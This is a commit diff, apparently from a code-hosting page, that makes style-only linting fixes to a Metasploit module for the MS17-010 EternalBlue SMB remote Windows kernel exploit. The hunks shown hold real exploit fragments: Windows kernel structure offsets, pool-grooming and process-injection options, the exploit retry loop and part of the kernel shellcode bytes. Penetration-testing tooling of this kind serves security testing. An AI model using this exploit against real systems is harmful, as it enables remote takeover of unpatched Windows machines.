Stop some of the rubocop carnage
bwatters-r7
parent
5ec155fd44
commit
4f2ba46125
|
|
@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',
|
'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',
|
||||||
'Description' => %q{
|
'Description' => %q(
|
||||||
This module is a port of the Equation Group ETERNALBLUE exploit, part of
|
This module is a port of the Equation Group ETERNALBLUE exploit, part of
|
||||||
the FuzzBunch toolkit released by Shadow Brokers.
|
the FuzzBunch toolkit released by Shadow Brokers.
|
||||||
|
|
||||||
|
|
@ -35,9 +35,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
On some systems, this module may cause system instability and crashes, such as a BSOD or
|
On some systems, this module may cause system instability and crashes, such as a BSOD or
|
||||||
a reboot. This may be more likely with some payloads.
|
a reboot. This may be more likely with some payloads.
|
||||||
},
|
),
|
||||||
|
|
||||||
'Author' => [
|
'Author' =>
|
||||||
|
[
|
||||||
'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0
|
'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0
|
||||||
'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius
|
'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius
|
||||||
'Equation Group',
|
'Equation Group',
|
||||||
|
|
@ -59,29 +60,29 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
{
|
{
|
||||||
'EXITFUNC' => 'thread',
|
'EXITFUNC' => 'thread',
|
||||||
'WfsDelay' => 5,
|
'WfsDelay' => 5
|
||||||
},
|
},
|
||||||
'Privileged' => true,
|
'Privileged' => true,
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'Space' => 2000, # this can be more, needs to be recalculated
|
'Space' => 2000, # this can be more, needs to be recalculated
|
||||||
'EncoderType' => Msf::Encoder::Type::Raw,
|
'EncoderType' => Msf::Encoder::Type::Raw
|
||||||
},
|
},
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'Windows 7 and Server 2008 R2 (x64) All Service Packs',
|
[
|
||||||
|
'Windows 7 and Server 2008 R2 (x64) All Service Packs',
|
||||||
{
|
{
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Arch' => [ARCH_X64],
|
'Arch' => [ARCH_X64],
|
||||||
|
|
||||||
'os_patterns' => ['Server 2008 R2', 'Windows 7', 'Windows Embedded Standard 7'],
|
'os_patterns' => ['Server 2008 R2', 'Windows 7', 'Windows Embedded Standard 7'],
|
||||||
'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset
|
'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset
|
||||||
'et_alertable' => 0x4c, # ETHREAD.Alertable offset
|
'et_alertable' => 0x4c, # ETHREAD.Alertable offset
|
||||||
'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset
|
'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset
|
||||||
'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset
|
'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset
|
||||||
}
|
}
|
||||||
],
|
]
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
'DisclosureDate' => 'Mar 14 2017',
|
'DisclosureDate' => 'Mar 14 2017',
|
||||||
|
|
@ -98,15 +99,17 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
OptBool.new('VERIFY_ARCH', [true, "Check if remote architecture matches exploit Target.", true]),
|
OptBool.new('VERIFY_ARCH', [true, "Check if remote architecture matches exploit Target.", true]),
|
||||||
OptString.new('SMBUser', [false, '(Optional) The username to authenticate as', '']),
|
OptString.new('SMBUser', [false, '(Optional) The username to authenticate as', '']),
|
||||||
OptString.new('SMBPass', [false, '(Optional) The password for the specified username', '']),
|
OptString.new('SMBPass', [false, '(Optional) The password for the specified username', '']),
|
||||||
OptString.new('SMBDomain', [ false, '(Optional) The Windows domain to use for authentication', '.']),
|
OptString.new('SMBDomain', [false, '(Optional) The Windows domain to use for authentication', '.'])
|
||||||
])
|
]
|
||||||
|
)
|
||||||
register_advanced_options(
|
register_advanced_options(
|
||||||
[
|
[
|
||||||
OptString.new('ProcessName', [true, 'Process to inject payload into.', 'spoolsv.exe']),
|
OptString.new('ProcessName', [true, 'Process to inject payload into.', 'spoolsv.exe']),
|
||||||
OptInt.new('MaxExploitAttempts', [true, "The number of times to retry the exploit.", 3]),
|
OptInt.new('MaxExploitAttempts', [true, "The number of times to retry the exploit.", 3]),
|
||||||
OptInt.new('GroomAllocations', [true, "Initial number of times to groom the kernel pool.", 12]),
|
OptInt.new('GroomAllocations', [true, "Initial number of times to groom the kernel pool.", 12]),
|
||||||
OptInt.new( 'GroomDelta', [ true, "The amount to increase the groom count by per try.", 5 ] ),
|
OptInt.new('GroomDelta', [true, "The amount to increase the groom count by per try.", 5])
|
||||||
])
|
]
|
||||||
|
)
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
@ -118,9 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
begin
|
begin
|
||||||
for i in 1..datastore['MaxExploitAttempts']
|
for i in 1..datastore['MaxExploitAttempts']
|
||||||
|
|
||||||
grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)
|
grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)
|
||||||
|
|
||||||
smb_eternalblue(datastore['ProcessName'], grooms)
|
smb_eternalblue(datastore['ProcessName'], grooms)
|
||||||
|
|
||||||
# we don't need this sleep, and need to find a way to remove it
|
# we don't need this sleep, and need to find a way to remove it
|
||||||
|
|
@ -605,7 +606,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
(dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF
|
(dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def make_kernel_shellcode(proc_name)
|
def make_kernel_shellcode(proc_name)
|
||||||
# see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
|
# see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
|
||||||
# Length: 1019 bytes
|
# Length: 1019 bytes
|
||||||
|
|
@ -675,7 +675,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
"\xFF\x31\xC9\x51\x51\x51\x51\x41\x59\x4C\x8D\x05\x1A\x00\x00\x00" +
|
"\xFF\x31\xC9\x51\x51\x51\x51\x41\x59\x4C\x8D\x05\x1A\x00\x00\x00" +
|
||||||
"\x5A\x48\x83\xEC\x20\x41\xBB\x46\x45\x1B\x22\xE8\x68\xFF\xFF\xFF" +
|
"\x5A\x48\x83\xEC\x20\x41\xBB\x46\x45\x1B\x22\xE8\x68\xFF\xFF\xFF" +
|
||||||
"\x48\x89\xEC\x5D\x41\x5F\x5E\xC3"#\x01\x00\xC3"
|
"\x48\x89\xEC\x5D\x41\x5F\x5E\xC3"#\x01\x00\xC3"
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
# Sets common SMB1 Header values used by the various
|
# Sets common SMB1 Header values used by the various
|
||||||
|
|
@ -691,7 +690,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
packet
|
packet
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
# Returns the value to be passed to SMB clients for
|
# Returns the value to be passed to SMB clients for
|
||||||
# the password. If the user has not supplied a password
|
# the password. If the user has not supplied a password
|
||||||
# it returns an empty string to trigger an anonymous
|
# it returns an empty string to trigger an anonymous
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue